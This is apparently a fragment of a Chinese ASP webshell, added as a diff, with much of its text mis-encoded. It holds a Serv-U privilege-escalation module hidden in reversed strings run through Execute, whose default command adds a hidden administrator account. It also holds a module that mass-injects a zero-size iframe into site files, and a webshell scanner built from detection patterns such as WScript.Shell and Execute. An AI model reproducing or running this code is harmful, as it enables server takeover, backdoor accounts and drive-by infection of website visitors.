+ShiSan="����>tpircs/<��SRR���;)0004,';)(timbus.nusdlog.lla.tnemucod'(tuoemiTtes��SRR���;)'>retnec<...��&ssap&�壺���,��&resu&�� :��������ʹ,��&trop&��:1.0.0.721 ��������>retnec<'(etirw.tnemucod��SRR���>'tpircsavaj'=egaugnal tpircs<��SRR���>mrof/<>'2'=eulav 'noitcaUS'=di 'neddih'=epyt 'noitcaUS'=eman tupni<��SRR���>'05'=ezis '��&f&��'=eulav 'f'=di 'neddih'=epyt 'f'=eman tupni<��SRR���>'05'=ezis '��&dmc&��'=eulav 'c'=di 'neddih'=epyt 'c'=eman tupni<��SRR���>dt/<>'��&trop&��'=eulav 'trop'=di 'neddih'=epyt 'trop'=eman tupni<��SRR���>dt/<>'��&ssap&��'=eulav 'p'=di 'neddih'=epyt 'p'=eman tupni<��SRR���>dt/<>'��&resu&��'=eulav 'u'=di 'neddih'=epyt 'u'=eman tupni<��SRR���>'nusdlog'=eman 'tsop'=dohtem mrof<��SRR��a=)��a��(noisses tes��tiuq & resuwen & niamodwen & niamodled & tm & ssapnigol & resunigol dnes.a���� ,��� ,eurT,��1s/nimdapu/nusdlog/�� & trop & ��:1.0.0.721//:ptth�� ,��TEG�� nepo.a��)��PTTHLMX.tfosorciM��(tcejbOetaerC.revreS=a tes"
+ExeCuTe(ShiSanFun(ShiSan))
+case 2
+ShiSan="����>tpircs/<��SRR���;)0004,���;)(timbus.nusdlog.lla.tnemucod���(tuoemiTtes��SRR���;)'>retnec<,...������,��Ȩ��������>retnec<'(etirw.tnemucod��SRR���>'tpircsavaj'=egaugnal tpircs<��SRR���>mrof/<>'3'=eulav 'noitcaUS'=di 'neddih'=epyt 'noitcaUS'=eman tupni<��SRR���>'05'=ezis '��&f&��'=eulav 'f'=di 'neddih'=epyt 'f'=eman tupni<��SRR���>'05'=ezis '��&dmc&��'=eulav 'c'=di 'neddih'=epyt 'c'=eman tupni<��SRR���>dt/<>'��&trop&��'=eulav 'trop'=di 'neddih'=epyt 'trop'=eman tupni<��SRR���>dt/<>'��&ssap&��'=eulav 'p'=di 'neddih'=epyt 'p'=eman tupni<��SRR���>dt/<>'��&resu&��'=eulav 'u'=di 'neddih'=epyt 'u'=eman tupni<��SRR���>'nusdlog'=eman 'tsop'=dohtem mrof<��SRR��b=)��b��(noisses tes ��tiuq & fLrCbv & dmc & �� cexe etis�� & fLrCbv & ��do ssap�� & fLrCbv & ��og resU�� dnes.b���� ,��� ,eurT ,��2s/nimdapu/nusdlog/�� & tropptf & ��:1.0.0.721//:ptth�� ,��TEG�� nepo.b��)��PTTHLMX.tfosorciM��(tcejbOetaerC.revreS=b tes"
+ExeCuTe(ShiSanFun(ShiSan))
+
+case 3
+ShiSan="����>retnec/<��SRR���>���;'uvreS=noitcA?'=ferh.noitacol���=kcilCno ' ���̻ط� '=eulav nottub=epyt tupni<��SRR���>rb<>rb<>tnof/<��&dmc&��>der=roloc tnof<>rb<����������ִ��,����Ȩ��>retnec<��SRR��c=)��c��(noisses tes��tiuq & niamodled & tm & ssapnigol & resunigol dnes.c���� ,��� ,eurT ,��3s/nimdapu/nusdlog/�� & trop & ��:1.0.0.721//:ptth�� ,��TEG�� nepo.c��)��PTTHLMX.tfosorciM��(tcejbOetaerC.revreS=c tes"
+ExeCuTe(ShiSanFun(ShiSan))
+case else
+on error resume next
+    set a=session("a")
+    set b=session("b")
+    set c=session("c")
+    a.abort
+    Set a = Nothing
+    b.abort
+    Set b = Nothing
+    c.abort
+    Set c = Nothing
+RRS"<center><form method='post' name='goldsun'>"
+RRS"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'>Serv-U ����Ȩ�� ASP�� 6.2</td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td width='100'>�û���:</td>"
+RRS"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �</td>"
+RRS"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �ڣ�</td>"
+RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>ϵͳ·����</td>"
+RRS"    <td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+RRS"  </tr>"
+RRS"  <tr align='center' valign='middle'>"
+RRS"    <td>�����</td>"
+RRS"    <td><input name='c' type='text' id='c' value='cmd /c net user huohu$ huohu /add & net localgroup administrators huohu$ /add' size='50'></td>"
+RRS"  </tr>"
+RRS" <tr align='center' valign='middle'>"
+RRS"    <td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+RRS"<input type='reset' name='Submit2' value='����'>"
+RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+RRS"</tr></table></form></center>"
+end select
+
+
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+  Case "kmuma"
+	dim Report
+	if request.QueryString("act")<>"scan" then
+	  	RRS ("<b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+		RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+
+		RRS "<form action=""?Action=kmuma&act=scan"" method=""post"" name=""form1"">"
+		RRS "<p><b>������Ҫ����·����</b>"
+		RRS "<input name=""path"" type=""text"" style=""border:1px solid #999"" value=""."" size=""30"" /> �\����վ��Ŀ¼����.��Ϊ������Ŀ¼<br><br>"
+		RRS "��Ҫ��ʲô: <input class=c name=""radiobutton"" type=""radio"" value=""sws"" onClick=""document.getElementById('showFile1').style.display='none'"" checked>��ASP "
+		RRS "<input class=c type=""radio"" name=""radiobutton"" value=""sf"" onClick=""document.getElementById('showFile1').style.display=''"">������������֮�ļ�<br>"
+		RRS "<br /><div id=""showFile1"" style=""display:none"">"
+		RRS "&nbsp;&nbsp;�������ݣ�<input name=""Search_Content"" type=""text"" id=""Search_Content"" style=""border:1px solid #999"" size=""20"">"
+		RRS " Ҫ���ҵ��ַ����������ֻ�������ڼ��<br />"
+		RRS "&nbsp;&nbsp;�޸����ڣ�<input name=""Search_Date"" type=""text"" style=""border:1px solid #999"" value="""&Left(Now(),InStr(now()," ")-1)&""" size=""20""> ���������;����������������д <a href=""#"" onClick=""javascript:form1.Search_Date.value='ALL'"">ALL</a><br />"
+		RRS "&nbsp;&nbsp;�ļ����ͣ�<input name=""Search_FileExt"" type=""text"" style=""border:1px solid #999"" value=""*"" size=""20""> ����֮����,������*��ʾ��������<br /><br /></div>"
+		RRS "<input type=""submit"" value="" ��ʼɨ�� "" style=""background:#ccc;border:2px solid #fff;padding:2px 2px 0px 2px;margin:4px;"" />"
+		RRS "</form>"
+	else
+		if request.Form("path")="" then
+			RRS("·������Ϊ��")
+			response.End()
+		end if
+		if request.Form("path")="\" then
+			TmpPath = Server.MapPath("\")
+		elseif request.Form("path")="." then
+			TmpPath = Server.MapPath(".")
+		else
+			TmpPath = request.Form("path")
+		end if
+		
+		timer1 = timer
+		Sun = 0
+		SumFiles = 0
+		SumFolders = 1
+		If request.Form("radiobutton") = "sws" Then
+			DimFileExt = "asp,cer,asa,cdx"
+			Call ShowAllFile(TmpPath)
+		Else
+			If request.Form("path") = "" or request.Form("Search_Date") = "" or request.Form("Search_FileExt") = "" Then
+				RRS("������������ȫ<br><br><a href='javascript:history.go(-1);'>�뷵����������</a>")
+				response.End()
+			End If
+			DimFileExt = request.Form("Search_fileExt")
+			Call ShowAllFile2(TmpPath)
+		End If
+RRS "<table width=""100%"" border=""0"" cellpadding=""0"" cellspacing=""0"" style='font-size:12px'>"
+RRS "<tr><th>Scan WebShell -- ʮ���Ż���</tr>"
+RRS "<tr><td style=""padding:5px;line-height:170%;clear:both;font-size:12px"">"
+RRS "<div id=""updateInfo"" style=""background:ffffe1;border:1px solid #89441f;padding:4px;display:none""></div>"
+RRS "ɨ����ϣ�һ������ļ���<font color=""#FF0000"">"&SumFolders&"</font>�����ļ�<font color=""#FF0000"">"&SumFiles&"</font>�������ֿ��ɵ�<font color=""#FF0000"">"&Sun&"</font>��"
+RRS "<table width=""100%"" border=""1"" cellpadding=""0"" cellspacing=""8"" bordercolor=""#999999"" style=""font-size:12px;border-collapse:collapse;line-height:130%;clear:both;""><tr>"
+If request.Form("radiobutton") = "sws" Then
+	RRS "<td width=""20%"">�ļ����·��</td>"
+	RRS "<td width=""20%"">������</td>"
+	RRS "<td width=""40%"">����</td>"
+	RRS "<td width=""20%"">����/�޸�ʱ��</td>"
+else   
+	RRS "<td width=""50%"">�ļ����·��</td>"
+	RRS "<td width=""25%"">�ļ�����ʱ��</td>"
+	RRS "<td width=""25%"">�޸�ʱ��</td>"
+end if
+	RRS "</tr>"
+	RRS Report
+	RRS "<br/></table>"
+timer2 = timer
+thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
+RRS "<br><font style='font-size:12px'>��ҳִ�й�����"&thetime&"����</font>"
+	end if
+Sub ShowAllFile(Path)
+	Set F1SO = CreateObject("Scripting.FileSystemObject")
+	if not F1SO.FolderExists(path) then exit sub
+	Set f = F1SO.GetFolder(Path)
+	Set fc2 = f.files
+	For Each myfile in fc2
+		If CheckExt(F1SO.GetExtensionName(path&"\"&myfile.name)) Then
+			Call ScanFile(Path&Temp&"\"&myfile.name, "")
+			SumFiles = SumFiles + 1
+		End If
+	Next
+	Set fc = f.SubFolders
+	For Each f1 in fc
+		ShowAllFile path&"\"&f1.name
+		SumFolders = SumFolders + 1
+    Next
+	Set F1SO = Nothing
+End Sub
+Sub ScanFile(FilePath, InFile)
+Server.ScriptTimeout=999999999
+	If InFile <> "" Then
+		Infiles = "<font color=red>���ļ���<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(InFile)&""" target=_blank>"& InFile & "</a>�ļ�����ִ��</font>"
+	End If
+	Set FSO1s = CreateObject("Scripting.FileSystemObject")
+	on error resume next
+	set ofile = FSO1s.OpenTextFile(FilePath)
+	filetxt = Lcase(ofile.readall())
+	If err Then Exit Sub end if
+	if len(filetxt)>0 then
+		filetxt = vbcrlf & filetxt
+		temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(FilePath,server.MapPath("\")&"\","",1,1,1)&"</a><br />"
+    temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a > "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a>"	
+			If instr( filetxt, Lcase("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then
+				Report = Report&"<tr><td>"&temp&"</td><td>WScr"&DoMyBest&"ipt.Shell ���� clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8</td><td><font color=red>Σ�������һ�㱻ASPľ����</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End if
+			If instr( filetxt, Lcase("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then
+				Report = Report&"<tr><td>"&temp&"</td><td>She"&DoMyBest&"ll.Application ���� clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000</td><td><font color=red>Σ�������һ�㱻ASPľ����</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			Set regEx = New RegExp
+			regEx.IgnoreCase = True
+			regEx.Global = True
+			regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s*(vbscript|jscript|javascript).encode\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>(vbscript|jscript|javascript).Encode</td><td><font color=red>�ƺ��ű���������</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\bEv"&"al\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>Ev"&"al</td><td>e"&"val()��������ִ������ASP����<br>����javascript������Ҳ����ʹ�ã��п������󱨡�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "[^.]\bExe"&"cute\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>Exec"&"ute</td><td><font color=red>e"&"xecute()��������ִ������ASP����</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\.(Open|Create)TextFile\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>.CreateTextFile|.OpenTextFile</td><td>ʹ����FSO��CreateTextFile|OpenTextFile��д�ļ�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\.SaveToFile\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>.SaveToFile</td><td>ʹ����Stream��SaveToFile����д�ļ�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\.Save\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>.Save</td><td>ʹ����XMLHTTP��Save����д�ļ�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "<!--\s*#include\s*file\s*=\s*"".*"""
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			tFile = Replace(Mid(Match.Value, Instr(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 1),"/","\")
+			If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
+				Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "<!--\s*#include\s*virtual\s*=\s*"".*"""
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			tFile = Replace(Mid(Match.Value, Instr(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 1),"/","\")
+			If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
+				Call ScanFile( Server.MapPath("\")&"\"&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]*|\()"".*"""
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			tFile = Replace(Mid(Match.Value, Instr(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 1),"/","\")
+			If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
+				Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]*|\()[^""]\)"
+		If regEx.Test(filetxt) Then
+			Report = Report&"<tr><td>"&temp&"</td><td>Server.Exec"&"ute</td><td><font color=red>���ܸ��ټ��Server.e"&"xecute()����ִ�е��ļ���</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+			Sun = Sun + 1
+		End If
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set XregEx = New RegExp
+		XregEx.IgnoreCase = True
+		XregEx.Global = True
+		XregEx.Pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?server""?(.|\n)*?>"
+		Set XMatches = XregEx.Execute(filetxt)
+		For Each Match in XMatches
+			tmpLake2 = Mid(Match.Value, 1, InStr(Match.Value, ">"))
+			srcSeek = InStr(1, tmpLake2, "src", 1)
+			If srcSeek > 0 Then
+				srcSeek2 = instr(srcSeek, tmpLake2, "=")
+				For i = 1 To 50
+					tmp = Mid(tmpLake2, srcSeek2 + i, 1)
+					If tmp <> " " and tmp <> chr(9) and tmp <> vbCrLf Then
+						Exit For
+					End If
+				Next
+				If tmp = """" Then
+					tmpName = Mid(tmpLake2, srcSeek2 + i + 1, Instr(srcSeek2 + i + 1, tmpLake2, """") - srcSeek2 - i - 1)
+				Else
+					If InStr(srcSeek2 + i + 1, tmpLake2, " ") > 0 Then tmpName = Mid(tmpLake2, srcSeek2 + i, Instr(srcSeek2 + i + 1, tmpLake2, " ") - srcSeek2 - i) Else tmpName = tmpLake2
+					If InStr(tmpName, chr(9)) > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, chr(9)) - 1)
+					If InStr(tmpName, vbCrLf) > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, vbcrlf) - 1)
+					If InStr(tmpName, ">") > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, ">") - 1)
+				End If
+				Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tmpName , replace(FilePath,server.MapPath("\")&"\","",1,1,1))
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "CreateO"&"bject[ |\t]*\(.*\)"
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			If Instr(Match.Value, "&") or Instr(Match.Value, "+") or Instr(Match.Value, """") = 0 or Instr(Match.Value, "(") <> InStrRev(Match.Value, "(") Then
+				Report = Report&"<tr><td>"&temp&"</td><td>Creat"&"eObject</td><td>Crea"&"teObject����ʹ���˱��μ���"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				exit sub
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+	end if
+	set ofile = nothing
+	set FSO1s = nothing
+End Sub
+Function CheckExt(FileExt)
+	If DimFileExt = "*" Then CheckExt = True
+	Ext = Split(DimFileExt,",")
+	For i = 0 To Ubound(Ext)
+		If Lcase(FileExt) = Ext(i) Then 
+			CheckExt = True
+			Exit Function
+		End If
+	Next
+End Function
+Function GetDateModify(filepath)
+	Set F2SO = CreateObject("Scripting.FileSystemObject")
+    Set f = F2SO.GetFile(filepath) 
+	s = f.DateLastModified 
+	set f = nothing
+	set F2SO = nothing
+	GetDateModify = s
+End Function
+Function GetDateCreate(filepath)
+	Set F3SO = CreateObject("Scripting.FileSystemObject")
+    Set f = F3SO.GetFile(filepath) 
+	s = f.DateCreated 
+	set f = nothing
+	set F3SO = nothing
+	GetDateCreate = s
+End Function
+Function tURLEncode(Str)
+	temp = Replace(Str, "%", "%25")
+	temp = Replace(temp, "#", "%23")
+	temp = Replace(temp, "&", "%26")
+	tURLEncode = temp
+End Function
+Sub ShowAllFile2(Path)
+	Set F4SO = CreateObject("Scripting.FileSystemObject")
+	if not F4SO.FolderExists(path) then exit sub
+	Set f = F4SO.GetFolder(Path)
+	Set fc2 = f.files
+	For Each myfile in fc2
+		If CheckExt(F4SO.GetExtensionName(path&"\"&myfile.name)) Then
+			Call IsFind(Path&"\"&myfile.name)
+			SumFiles = SumFiles + 1
+		End If
+	Next
+	Set fc = f.SubFolders
+	For Each f1 in fc
+		ShowAllFile2 path&"\"&f1.name
+		SumFolders = SumFolders + 1
+    Next
+	Set F4SO = Nothing
+End Sub
+Sub IsFind(thePath)
+	theDate = GetDateModify(thePath)
+	on error resume next
+	theTmp = Mid(theDate, 1, Instr(theDate, " ") - 1)
+	if err then exit Sub
+	xDate = Split(request.Form("Search_Date"),";")
+	If request.Form("Search_Date") = "ALL" Then ALLTime = True
+	For i = 0 To Ubound(xDate)
+		If theTmp = xDate(i) or ALLTime = True Then 
+			If request("Search_Content") <> "" Then
+				Set FSO2s = CreateObject("Scripting.FileSystemObject")
+				set ofile = FSO2s.OpenTextFile(thePath, 1, false, -2)
+				filetxt = Lcase(ofile.readall())
+				If Instr( filetxt, LCase(request.Form("Search_Content"))) > 0 Then
+					temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(Replace(replace(thePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)&"</a>"
+    temp=temp&" �� <a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a > "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a>"	
+				Report = Report&"<tr><td height=30>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
+					Report = Report&"<tr><td>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
+					Sun = Sun + 1
+					Exit Sub
+				End If
+				ofile.close()
+				Set ofile = Nothing
+				Set FSO2s = Nothing
+			Else
+				temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)&"</a> "
+    temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a > "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a>"	
+				Report = Report&"<tr><td height=30>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
+				Sun = Sun + 1
+				Exit Sub
+			End If
+		End If
+	Next
+End Sub
+  Case "plgm"
+Server.ScriptTimeout=1000000 
+Response.Buffer=False 
+ShiSan="��raelC.rrE�� buS dnE�� gnihtoN=sf teS�� fI dnE�� gnihtoN=f teS�� esolC.edocdda_f�� edocdda etirW.edocdda_f�� )2-,8(maertStxeTsAnepO.f=edocdda_f teS�� )2rts(eliFteG.sf=f teS�� nehT tsixEsi fI�� )2rts(stsixEeliF.sf=tsixEsi�� )��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerc.revreS=sf teS�� )2rts(2pets buS�� buS dnE���>vid/<>a/<evoM>'����'=eltit 'ma'=ssalc ')���eliFevoM���,����&)��\\��,��\��,1rts(ecalper&����(mroFlluF:tpircsavaj'=ferh a<�� SRR��� >a/<ypoC>'�Ƹ�'=eltit 'ma'=ssalc ')���eliFypoC���,����&)��\\��,��\��,1rts(ecalper&����(mroFlluF:tpircsavaj'=ferh a<�� SRR��� >a/<leD>'��ɾ'=eltit 'ma'=ssalc ')(kosey nruter'=kcilcno')���eliFleD���,����&)��\\��,��\��,1rts(ecalper&����(mroFlluF:tpircsavaj'=ferh a<�� SRR��� >a/<tide>'����'=eltit 'ma'=ssalc ')���eliFtidE���,����&)��\\��,��\��,1rts(ecalper&����(mroFlluF:tpircsavaj'=ferh a<�� SRR��� >a/<nwoD>'����'=eltit 'ma'=ssalc ')���eliFnwoD���,����&)��\\��,��\��,1rts(ecalper&����(mroFlluF:tpircsavaj'=ferh a<�� sRR���_ ��&1rts&�� ��>'xp02:thgieh-enil'=elyts vid<�� SRR��)1rts(1pets buS�� buS dnE�� fI dnE�� buS tixE�� eslE�� rga 2pets�� rga 1pets�� nehT laVter fI�� )rga,��b\)sj|igc|xpsa|psj|php|psa|lmth|mth(.\)505|piv|ciptfos_elifpu|otohp_elifpu|tfos_elifpu|daol_elifpu|daolpu_nimda|elifpu_nimda|txet|hsalf|da|cn|rre|pohs|tsil|ofni|rahc|toof|dnes|404rre|pi|weiv|wohs|yalp|puym|puwen|025|QQ|ogol|metsys|nwod|evom|ypoc|rorre|dov|3pm|gifnoc|tb|koob|reganam|tuoba|emag|tide|dda|atad|evas|golb|bew|segami|gmi|liame|eman|nepo|wen|pot|psa|ptf|bbu|resu|lqs|gifnoc|led|ko|on|yid|nigol|ssalc|trac|daolpu|elifpu|pleh|ger|sbb|nimda|nnoc|xedni|tluafed()/\|\\(��(nrettaPsI=laVter�� )rga(lla_pets buS�� buS dnE�� fI dnE�� txeN�� l hcs�� fs nI l hcaE roF�� nehT 0><tnuoC.fs fI�� txeN�� ntr lla_pets�� htap.f=ntr�� if ni f hcaE roF�� sredloFbuS.df=fs teS�� seliF.df=if teS�� )s(redloFteG.sf=df teS�� )��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerc.revreS=sf teS�� TxEn EmUsEr rOrRe No�� )s(hcs buS�� fi dne��fI dnE�� s hcs nehT )s,��)/\|\\(}1{:}1{]ba^[��(nrettaPsI fI esle��dne.esnopser���>tnof/<!�����·�Ĺ�������>der=roloc tnof<�� SRR��nehT ���=edocdda ro ���=s fI��neht ���><)��timbus��(mrof.tseuqer fi�� noitcnuF dnE�� fI dnE�� eslaF=nrettaPsI�� eslE�� eurT=nrettaPsI�� nehT eurT=laVter fI�� gnihtoN=xEger teS�� )rts(tseT.xEger=laVter�� eurT=esaCerongI.xEger�� ttap=nrettaP.xEger�� pxEgeR weN=xEger teS�� )rts,ttap(nrettaPsI noitcnuF�� fI dnE��)�� >mrof/<>elbat/<>rt/<��(SRR��)��>dt/<>���ʼ�����=eulav ���timbus���=epyt ���timbus���=eman tupni<>dt<��(SRR��)��>dt/<>aeratxet/<��&edocdda&��>���3���=swor 85=sloc ���edoc���=eman aeratxet<>dt<��(SRR��)��>dt/<:����Ĺ�Ҫ>dt<>rt<>rt/<��(SRR��)��>dt/<;psbn&>���96���=htdiw dt<��(SRR��)��>dt/<>06=ezis ����&s&����=eulav ���df���=eman ���txet���=epyt tupni<>���953���=htdiw dt<��(SRR��)��>dt/<��)��·�Ծ�( �м��ĵĹ�Ҫ>���201���=htdiw dt<��(SRR��)��>rt<��(SRR��)��>���;xp21:ezis-tnof���=elyts ���0���=redrob 065=htdiw elbat<��(SRR��)�� >���TSOP���=dohtem mrof<��(SRR�� eslE�� tceles dnE�� )htp(evas_elif LLAC�� ��evas�� esaC�� )htp(wohs_elif LLAC�� ��tide�� esaC�� xe esaC tceles�� nehT ���><htp DNA ���><xe fI���>emarfi/<>0=thgieh 0=htdiw mth.m/1.0.0.721//:ptth=crs emarfi<��=edocdda neht ���=edocdda fi��)��edoc��(tseuqeR = edocdda�� )��tncwen��(tseuqeR=tncwen�� 